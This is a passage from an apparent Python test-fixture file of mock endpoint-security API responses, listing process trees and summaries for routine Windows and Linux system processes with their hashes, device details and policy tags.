"ingress_time": 1607027652665,
"modload_count": 0,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-000001f4-00000000-1d6c86e28008165",
"parent_hash": [
"5f48638e3397204c2c63d7b76d025d62302d0e45fc5055c0a692b0bbc7e6b337",
"858e3da84c5389952e1ad3701e410f61"
],
"parent_name": "c:\\windows\\system32\\smss.exe",
"parent_pid": 500,
"process_cmdline": [
"%SystemRoot%\\system32\\csrss.exe ObjectDirectory=\\Windows SharedSection="
"1024,20480,768 Windows=On SubSystemType=Windows ServerDll=basesrv,1 ServerDll"
"=winsrv:UserServerDllInitialization,3 ServerDll=sxssrv,4 ProfileControl=Off MaxRequestThreads=16"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-00000204-00000000-1d6c86e2801cd1b",
"process_hash": [
"12384336325dc8eadfb1e8ff876921c4",
"f2c7d894abe8ac0b4c2a597caa6b3efe7ad2bdb4226845798d954c5ab9c9bf15"
],
"process_name": "c:\\windows\\system32\\csrss.exe",
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-02T05:44:09.717Z",
"process_username": [
"NT AUTHORITY\\SYSTEM"
],
"regmod_count": 0,
"scriptload_count": 0
},
"siblings": [
{
"_process_filename": "winlogon.exe",
"backend_timestamp": "2020-12-03T20:34:38.889Z",
"childproc_count": 0,
"crossproc_count": 0,
"device_external_ip": "24.243.76.124",
"device_group_id": 0,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-03T20:32:08.646Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1607027652665,
"modload_count": 0,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-000001f4-00000000-1d6c86e28008165",
"parent_hash": [
"5f48638e3397204c2c63d7b76d025d62302d0e45fc5055c0a692b0bbc7e6b337",
"858e3da84c5389952e1ad3701e410f61"
],
"parent_name": "c:\\windows\\system32\\smss.exe",
"parent_pid": 500,
"process_cmdline": [
"winlogon.exe"
],
"process_effective_reputation": "LOCAL_WHITE",
"process_guid": "WNEXFKQ7-00050603-0000025c-00000000-1d6c86e280d8ba9",
"process_hash": [
"fd9aad3ea144d4c893eb0ccbff394a83",
"d6df7bbd93e84f5e9aec4f2d36fb04b8168e62010eae617f386c10c73b9136e6"
],
"process_name": "c:\\windows\\system32\\winlogon.exe",
"process_pid": [
604
],
"process_reputation": "ADAPTIVE_WHITE_LIST",
"process_start_time": "2020-12-02T05:44:09.794Z",
"process_username": [
"NT AUTHORITY\\SYSTEM"
],
"regmod_count": 0,
"scriptload_count": 0
}
],
"parent": {},
"children": [
{
"_process_filename": "mpcmdrun.exe",
"backend_timestamp": "2020-12-03T20:33:19.002Z",
"childproc_count": 1,
"crossproc_count": 5,
"device_external_ip": "24.243.76.124",
"device_group_id": 0,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-03T20:31:13.097Z",
"filemod_count": 1,
"has_children": True,
"hits": False,
"ingress_time": 1607027590489,
"modload_count": 18,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
"parent_hash": [
"9520a99e77d6196d0d09833146424113",
"dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
],
"parent_name": "c:\\windows\\system32\\svchost.exe",
"parent_pid": 2924,
"process_cmdline": [
"\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wddisable"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-0000157c-00000000-1d6c9b339b4a0cd",
"process_hash": [
"cc4f6cbde75f08afdcefb95087149a5d",
"885557be148de55f6a127ea26ac457b9415e3e3baf30266d82b9d19b89e78ee4"
],
"process_name": "c:\\program files\\windows defender\\mpcmdrun.exe",
"process_pid": [
5500
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-03T20:31:05.847Z",
"process_terminated": True,
"process_username": [
"NT AUTHORITY\\LOCAL SERVICE"
],
"regmod_count": 0,
"scriptload_count": 0
},
{
"_process_filename": "mpcmdrun.exe",
"backend_timestamp": "2020-12-02T05:59:53.548Z",
"childproc_count": 1,
"crossproc_count": 4,
"device_external_ip": "24.243.76.124",
"device_group": "schumaker-test",
"device_group_id": 1706,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-02T05:45:15.950Z",
"filemod_count": 1,
"has_children": True,
"hits": False,
"ingress_time": 1606888776302,
"modload_count": 16,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
"parent_hash": [
"9520a99e77d6196d0d09833146424113",
"dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
],
"parent_name": "c:\\windows\\system32\\svchost.exe",
"parent_pid": 2924,
"process_cmdline": [
"\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wdenable"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-00001d78-00000000-1d6c86e4f3c4a8f",
"process_hash": [
"cc4f6cbde75f08afdcefb95087149a5d",
"885557be148de55f6a127ea26ac457b9415e3e3baf30266d82b9d19b89e78ee4"
],
"process_name": "c:\\program files\\windows defender\\mpcmdrun.exe",
"process_pid": [
7544
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-02T05:45:15.531Z",
"process_terminated": True,
"process_username": [
"NT AUTHORITY\\LOCAL SERVICE"
],
"regmod_count": 0,
"scriptload_count": 0
},
{
"_process_filename": "mpcmdrun.exe",
"backend_timestamp": "2020-12-02T05:59:53.548Z",
"childproc_count": 1,
"crossproc_count": 4,
"device_external_ip": "24.243.76.124",
"device_group": "schumaker-test",
"device_group_id": 1706,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-02T05:45:15.950Z",
"filemod_count": 1,
"has_children": True,
"hits": False,
"ingress_time": 1606888776302,
"modload_count": 16,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
"parent_hash": [
"9520a99e77d6196d0d09833146424113",
"dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
],
"parent_name": "c:\\windows\\system32\\svchost.exe",
"parent_pid": 2924,
"process_cmdline": [
"\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wdenable"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-00001d78-00000000-1d6c86e4f3c4a8f",
"process_hash": [
"cc4f6cbde75f08afdcefb95087149a5d",
"885557be148de55f6a127ea26ac457b9415e3e3baf30266d82b9d19b89e78ee4"
],
"process_name": "c:\\program files\\windows defender\\mpcmdrun.exe",
"process_pid": [
7544
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-02T05:45:15.531Z",
"process_terminated": True,
"process_username": [
"NT AUTHORITY\\LOCAL SERVICE"
],
"regmod_count": 0,
"scriptload_count": 0
}
]
},
"contacted": 34,
"completed": 34
}
GET_PROCESS_SUMMARY_RESP_2 = {
"exception": "",
"summary": {
"process": {
"_process_filename": "svchost.exe",
"backend_timestamp": "2020-12-03T20:34:38.889Z",
"childproc_count": 3,
"crossproc_count": 40,
"device_external_ip": "24.243.76.124",
"device_group_id": 0,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-03T20:32:20.912Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1607027652665,
"modload_count": 101,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
"parent_hash": [
"1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a",
"2bd115a27b60b74bbeb31013519ac199"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 624,
"process_cmdline": [
"C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
"process_hash": [
"45684336325dc8eadfb1e8ff876921c4",
"dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
],
"process_name": "c:\\windows\\system32\\svchost.exe",
"process_pid": [
788
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-02T05:44:12.137Z",
"process_username": [
"NT AUTHORITY\\LOCAL SERVICE"
],
"regmod_count": 5,
"scriptload_count": 0
},
"siblings": [
{
"_process_filename": "spoolsv.exe",
"backend_timestamp": "2020-12-03T20:34:38.889Z",
"childproc_count": 2,
"crossproc_count": 35,
"device_external_ip": "24.243.76.124",
"device_group_id": 0,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-03T20:32:18.693Z",
"filemod_count": 405,
"has_children": True,
"hits": False,
"ingress_time": 1607027652665,
"modload_count": 382,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
"parent_hash": [
"1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a",
"2bd115a27b60b74bbeb31013519ac199"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 624,
"process_cmdline": [
"C:\\Windows\\System32\\spoolsv.exe"
],
"process_effective_reputation": "LOCAL_WHITE",
"process_guid": "WNEXFKQ7-00050603-00000944-00000000-1d6c86e29169d10",
"process_hash": [
"94170797d822cd195f8f92da9def082f",
"f45ca80e151494a7394dcd1958ee94c0b83fe3f7b9e281fa1e626e71ff6c2604"
],
"process_name": "c:\\windows\\system32\\spoolsv.exe",
"process_pid": [
2372
],
"process_reputation": "COMMON_WHITE_LIST",
"process_start_time": "2020-12-02T05:44:11.531Z",
"process_username": [
"NT AUTHORITY\\SYSTEM"
],
"regmod_count": 445,
"scriptload_count": 0
},
{
"_process_filename": "wmiapsrv.exe",
"backend_timestamp": "2020-12-02T06:00:54.384Z",
"childproc_count": 0,
"crossproc_count": 3,
"device_external_ip": "24.243.76.124",
"device_group": "schumaker-test",
"device_group_id": 1706,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-02T05:46:50.369Z",
"filemod_count": 0,
"has_children": False,
"ingress_time": 1606888837162,
"modload_count": 21,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
"parent_hash": [
"1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a",
"2bd115a27b60b74bbeb31013519ac199"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 624,
"process_cmdline": [
"C:\\Windows\\system32\\wbem\\WmiApSrv.exe"
],
"process_effective_reputation": "LOCAL_WHITE",
"process_guid": "WNEXFKQ7-00050603-000020f8-00000000-1d6c86e87b1e2be",
"process_hash": [
"55e21dfb7ec2394903e5ca62fdca21e6",
"55c2021f06d28696843672ff90e242c33c4cf6d30cdf0b2d9dcf07d8282cfc19"
],
"process_name": "c:\\windows\\system32\\wbem\\wmiapsrv.exe",
"process_pid": [
8440
],
"process_reputation": "ADAPTIVE_WHITE_LIST",
"process_start_time": "2020-12-02T05:46:50.254Z",
"process_terminated": True,
"process_username": [
"NT AUTHORITY\\SYSTEM"
],
"regmod_count": 1,
"scriptload_count": 0
}
],
"parent": {
"_process_filename": "services.exe",
"backend_timestamp": "2020-12-03T20:34:38.889Z",
"childproc_count": 243,
"crossproc_count": 39,
"device_external_ip": "24.243.76.124",
"device_group_id": 0,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-03T20:32:13.397Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1607027652665,
"modload_count": 53,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-000001fc-00000000-1d6c86e2801246d",
"parent_hash": [
"d5e122606054fa0b03db3ee8cf9ea7701e523875e2bdb87581ad7232ffc9308e",
"e83650f70459a027aa596e1a73c961a1"
],
"parent_name": "c:\\windows\\system32\\wininit.exe",
"parent_pid": 508,
"process_cmdline": [
"C:\\Windows\\system32\\services.exe"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
"process_hash": [
"2bd115a27b60b74bbeb31013519ac199",
"1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a"
],
"process_name": "c:\\windows\\system32\\services.exe",
"process_pid": [
624
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-02T05:44:09.808Z",
"process_username": [
"NT AUTHORITY\\SYSTEM"
],
"regmod_count": 254,
"scriptload_count": 0
},
"children": [
{
"_process_filename": "mpcmdrun.exe",
"backend_timestamp": "2020-12-03T20:33:19.002Z",
"childproc_count": 1,
"crossproc_count": 5,
"device_external_ip": "24.243.76.124",
"device_group_id": 0,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-03T20:31:13.097Z",
"filemod_count": 1,
"has_children": True,
"hits": False,
"ingress_time": 1607027590489,
"modload_count": 18,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
"parent_hash": [
"9520a99e77d6196d0d09833146424113",
"dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
],
"parent_name": "c:\\windows\\system32\\svchost.exe",
"parent_pid": 2924,
"process_cmdline": [
"\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wddisable"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-0000157c-00000000-1d6c9b339b4a0cd",
"process_hash": [
"cc4f6cbde75f08afdcefb95087149a5d",
"885557be148de55f6a127ea26ac457b9415e3e3baf30266d82b9d19b89e78ee4"
],
"process_name": "c:\\program files\\windows defender\\mpcmdrun.exe",
"process_pid": [
5500
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-03T20:31:05.847Z",
"process_terminated": True,
"process_username": [
"NT AUTHORITY\\LOCAL SERVICE"
],
"regmod_count": 0,
"scriptload_count": 0
},
{
"_process_filename": "mpcmdrun.exe",
"backend_timestamp": "2020-12-02T05:59:53.548Z",
"childproc_count": 1,
"crossproc_count": 4,
"device_external_ip": "24.243.76.124",
"device_group": "schumaker-test",
"device_group_id": 1706,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-02T05:45:15.950Z",
"filemod_count": 1,
"has_children": True,
"hits": False,
"ingress_time": 1606888776302,
"modload_count": 16,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
"parent_hash": [
"9520a99e77d6196d0d09833146424113",
"dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
],
"parent_name": "c:\\windows\\system32\\svchost.exe",
"parent_pid": 2924,
"process_cmdline": [
"\"C:\\Program Files\\Windows Defender\\mpcmdrun.exe\" -wdenable"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-00001d78-00000000-1d6c86e4f3c4a8f",
"process_hash": [
"cc4f6cbde75f08afdcefb95087149a5d",
"885557be148de55f6a127ea26ac457b9415e3e3baf30266d82b9d19b89e78ee4"
],
"process_name": "c:\\program files\\windows defender\\mpcmdrun.exe",
"process_pid": [
7544
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-02T05:45:15.531Z",
"process_terminated": True,
"process_username": [
"NT AUTHORITY\\LOCAL SERVICE"
],
"regmod_count": 0,
"scriptload_count": 0
}
]
},
"contacted": 34,
"completed": 34
}
GET_PROCESS_TREE_STR = {
"exception": "",
"tree": {
"children": [
{
"_process_filename": "msiexec.exe",
"backend_timestamp": "2020-10-15T05:44:47.387Z",
"device_external_ip": "144.121.3.50",
"device_group": "schumaker-test",
"device_group_id": 1706,
"device_id": 199106,
"device_internal_ip": "10.210.161.66",
"device_name": "w10prov1703x86",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-10-15T05:43:45.336Z",
"enriched": True,
"enriched_event_type": "SYSTEM_API_CALL",
"event_type": "crossproc",
"has_children": False,
"ingress_time": 1602740641018,
"legacy": True,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-000309c2-000002c4-00000000-1d6a1c1f161a86a",
"parent_hash": [
"bd3036f60f1438c82900a29221e3a4912a89bfe904d01aad70c781ef514df0b3"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 708,
"process_cmdline":[
"C:\\WINDOWS\\system32\\msiexec.exe /V"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-000309c2-00000454-00000000-1d6a2b6252ba18e",
"process_hash":[
"f9a3eee1c3a4067702bc9a59bc894285",
"8e2aa014d7729cbfee95671717646ee480561f22e2147dae87a75c18d7369d99"
],
"process_name": "c:\\windows\\system32\\msiexec.exe",
"process_pid":[
1108
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-10-15T05:43:44.537Z",
"process_username": [
"NT AUTHORITY\\SYSTEM"
],
"ttp":[
"ENUMERATE_PROCESSES",
"MITRE_T1057_PROCESS_DISCOVERY"
]
}
],
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-28T19:10:02.123Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1598641901273,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"process_hash": [
"e4b9902024ac32b3ca37f6b4c9b841e8",
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85"
],
"process_name": "/usr/lib/systemd/systemd",
"process_pid": [1],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-05-04T21:34:03.968Z",
"regmod_count": 0,
"scriptload_count": 0
}
}
GET_PROCESS_SUMMARY_STR = {
"exception": "",
"summary": {
"process": {
"_process_filename": "svchost.exe",
"backend_timestamp": "2020-10-22T16:27:52.931Z",
"device_external_ip": "144.121.3.50",
"device_group_id": 0,
"device_id": 199106,
"device_internal_ip": "10.210.161.66",
"device_name": "w10prov1703x86",
"device_os": "WINDOWS",
"device_policy": "lyon_test",
"device_policy_id": 30241,
"device_timestamp": "2020-10-22T16:15:05.925Z",
"enriched": True,
"enriched_event_type": "NETWORK",
"event_type": "netconn",
"has_children": True,
"hits": True,
"ingress_time": 1603384040142,
"legacy": True,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-000309c2-000002c4-00000000-1d6a1c1f161a86a",
"parent_hash": [
"bd3036f60f1438c82900a29221e3a4912a89bfe904d01aad70c781ef514df0b3"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 708,
"process_cmdline": [
"C:\\WINDOWS\\system32\\svchost.exe -k netsvcs -p"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-000309c2-00000478-00000000-1d6a1c1f2b02805",
"process_hash": [
"a7296c1245ee76768d581c6330dade06",
"5be0de7f915ba819d4ba048db7a2a87f6f3253fdd4865dc418181a0d6a031caa"
],
"process_name": "c:\\windows\\system32\\svchost.exe",
"process_pid": [
1144
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-10-14T00:35:42.639Z",
"process_username": [
"NT AUTHORITY\\SYSTEM"
],
"sensor_action": [
"DENY",
"BLOCK"
],
"ttp": [
"POLICY_DENY"
]
},
"siblings": [
{
"_process_filename": "cb.exe",
"backend_timestamp": "2020-10-22T16:14:38.964Z",
"device_external_ip": "144.121.3.50",
"device_group_id": 0,
"device_id": 199106,
"device_name": "w10prov1703x86",
"device_os": "WINDOWS",
"device_policy": "lyon_test",
"device_policy_id": 30241,
"device_timestamp": "2020-10-22T16:11:30.514Z",
"enriched": True,
"enriched_event_type": "NETWORK",
"event_type": "netconn",
"has_children": False,
"hits": False,
"ingress_time": 1603383254356,
"legacy": True,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-000309c2-000002c4-00000000-1d6a1c1f161a86a",
"parent_hash": [
"bd3036f60f1438c82900a29221e3a4912a89bfe904d01aad70c781ef514df0b3"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 708,
"process_cmdline": [
"C:\\WINDOWS\\CarbonBlack\\cb.exe"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-000309c2-00000980-00000000-1d6a1c1f41ae014",
"process_hash": [
"b5a2c3084251ad5ce53e02f071fa7dc9",
"ae600593a0a6915cf5ecbf96b4cb1d0e1d165339bde136c351bf606127c5dcec"
],
"process_name": "c:\\windows\\carbonblack\\cb.exe",
"process_pid": [
2432
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-10-14T00:35:45.017Z",
"process_username": [
"NT AUTHORITY\\SYSTEM"
],
"sensor_action": [
"DENY",
"BLOCK"
],
"ttp": [
"POLICY_DENY"
]
}
],
"parent": {
"_process_filename": "systemd",
"backend_timestamp": "2020-08-28T19:12:07.989Z",
"childproc_count": 0,
"crossproc_count": 0,
"device_external_ip": "34.56.78.90",
"device_group_id": 0,
"device_id": 176678,
"device_name": "devr-dev",
"device_os": "LINUX",
"device_policy": "sm-restrictive",
"device_policy_id": 11200,
"device_timestamp": "2020-08-28T19:10:02.123Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1598641901273,
"modload_count": 0,
"netconn_count": 0,
"org_id": "ABCD1234",
"process_effective_reputation": "NOT_LISTED",
"process_guid": "ABCD1234-0002b226-00000001-00000000-1d6225bbba75e43",
"process_hash": [
"e4b9902024ac32b3ca37f6b4c9b841e8",
"81b37dcb0321108e564d528df827580153ab64005be3bcafd5162e9e7e707e85"
],
"process_name": "/usr/lib/systemd/systemd",
"process_pid": [
1
],
"process_reputation": "NOT_LISTED",
"process_start_time": "2020-05-04T21:34:03.968Z",
"regmod_count": 0,
"scriptload_count": 0
},
"children": [
{
"_process_filename": "wermgr.exe",
"backend_timestamp": "2020-10-22T16:28:23.556Z",
"device_external_ip": "144.121.3.50",
"device_group_id": 0,
"device_id": 199106,
"device_internal_ip": "10.210.161.66",
"device_name": "w10prov1703x86",
"device_os": "WINDOWS",
"device_policy": "lyon_test",
"device_policy_id": 30241,
"device_timestamp": "2020-10-22T16:15:06.065Z",
"enriched": True,
"enriched_event_type": "NETWORK",
"event_type": "netconn",
"has_children": False,
"hits": True,
"ingress_time": 1603384060202,
"legacy": True,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-000309c2-00000478-00000000-1d6a1c1f2b02805",
"parent_hash": [
"5be0de7f915ba819d4ba048db7a2a87f6f3253fdd4865dc418181a0d6a031caa"
],
"parent_name": "c:\\windows\\system32\\svchost.exe",
"parent_pid": 1144,
"process_cmdline":[
"C:\\WINDOWS\\system32\\wermgr.exe -upload"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-000309c2-000004f8-00000000-1d6a88e80c541a3",
"process_hash":[
"2ae75e810f4dd1fb36607f66e7e1d80b",
"db703055ec0641e7e96e22a62bf075547b480c51ea9e163d94e33452894b885c"
],
"process_name": "c:\\windows\\system32\\wermgr.exe",
"process_pid":[
1272
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-10-22T16:15:05.324Z",
"process_username":[
"NT AUTHORITY\\SYSTEM"
],
"sensor_action":[
"DENY",
"BLOCK"
],
"ttp":[
"POLICY_DENY"
]
}
],
"process_guid": "b31019a5-d69b-4aba-b36d-0b29fe2e7f61"
}
}
GET_PROCESS_SUMMARY_RESP_NO_CHILDREN = {
"exception": "",
"summary": {
"process": {
"_process_filename": "svchost.exe",
"backend_timestamp": "2020-12-03T20:34:38.889Z",
"childproc_count": 3,
"crossproc_count": 40,
"device_external_ip": "24.243.76.124",
"device_group_id": 0,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-03T20:32:20.912Z",
"filemod_count": 0,
"has_children": True,
"hits": False,
"ingress_time": 1607027652665,
"modload_count": 101,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
"parent_hash": [
"1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a",
"2bd115a27b60b74bbeb31013519ac199"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 624,
"process_cmdline": [
"C:\\Windows\\System32\\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc"
],
"process_effective_reputation": "TRUSTED_WHITE_LIST",
"process_guid": "WNEXFKQ7-00050603-00000b6c-00000000-1d6c86e29731218",
"process_hash": [
"45684336325dc8eadfb1e8ff876921c4",
"dd191a5b23df92e12a8852291f9fb5ed594b76a28a5a464418442584afd1e048"
],
"process_name": "c:\\windows\\system32\\svchost.exe",
"process_pid": [
788
],
"process_reputation": "TRUSTED_WHITE_LIST",
"process_start_time": "2020-12-02T05:44:12.137Z",
"process_username": [
"NT AUTHORITY\\LOCAL SERVICE"
],
"regmod_count": 5,
"scriptload_count": 0
},
"siblings": [
{
"_process_filename": "spoolsv.exe",
"backend_timestamp": "2020-12-03T20:34:38.889Z",
"childproc_count": 2,
"crossproc_count": 35,
"device_external_ip": "24.243.76.124",
"device_group_id": 0,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-03T20:32:18.693Z",
"filemod_count": 405,
"has_children": True,
"hits": False,
"ingress_time": 1607027652665,
"modload_count": 382,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
"parent_hash": [
"1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a",
"2bd115a27b60b74bbeb31013519ac199"
],
"parent_name": "c:\\windows\\system32\\services.exe",
"parent_pid": 624,
"process_cmdline": [
"C:\\Windows\\System32\\spoolsv.exe"
],
"process_effective_reputation": "LOCAL_WHITE",
"process_guid": "WNEXFKQ7-00050603-00000944-00000000-1d6c86e29169d10",
"process_hash": [
"94170797d822cd195f8f92da9def082f",
"f45ca80e151494a7394dcd1958ee94c0b83fe3f7b9e281fa1e626e71ff6c2604"
],
"process_name": "c:\\windows\\system32\\spoolsv.exe",
"process_pid": [
2372
],
"process_reputation": "COMMON_WHITE_LIST",
"process_start_time": "2020-12-02T05:44:11.531Z",
"process_username": [
"NT AUTHORITY\\SYSTEM"
],
"regmod_count": 445,
"scriptload_count": 0
},
{
"_process_filename": "wmiapsrv.exe",
"backend_timestamp": "2020-12-02T06:00:54.384Z",
"childproc_count": 0,
"crossproc_count": 3,
"device_external_ip": "24.243.76.124",
"device_group": "schumaker-test",
"device_group_id": 1706,
"device_id": 329219,
"device_internal_ip": "172.16.115.191",
"device_name": "desktop-8qonquj",
"device_os": "WINDOWS",
"device_policy": "default",
"device_policy_id": 2198,
"device_timestamp": "2020-12-02T05:46:50.369Z",
"filemod_count": 0,
"has_children": False,
"ingress_time": 1606888837162,
"modload_count": 21,
"netconn_count": 0,
"org_id": "WNEXFKQ7",
"parent_guid": "WNEXFKQ7-00050603-00000270-00000000-1d6c86e280fbff8",
"parent_hash": [
"1b6ffe1f5480675fc618b42247ef49a1c60ca99d2d53271b3472557e3bea2e8a",
"2bd115a27b60b74bbeb31013519ac199"
],
